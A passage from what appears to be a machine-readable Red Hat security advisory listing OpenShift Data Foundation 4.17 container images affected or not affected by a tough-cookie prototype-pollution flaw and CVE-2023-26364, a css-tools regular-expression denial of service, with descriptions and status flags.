"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "tough-cookie: prototype pollution in cookie memstore", }, { cve: "CVE-2023-26364", cwe: { id: "CWE-20", name: "Improper Input Validation", }, discovery_date: "2023-11-17T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2250364", }, ], notes: [ { category: "description", text: "A flaw was found in Adobe CSS Tools. An improper input validation could result in a minor denial of service while parsing a malicious CSS with the parse component. User interaction and privileges are not required to jeopardize an environment.", title: "Vulnerability description", }, { category: "summary", text: "css-tools: Improper Input Validation causes Denial of Service via Regular Expression", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", 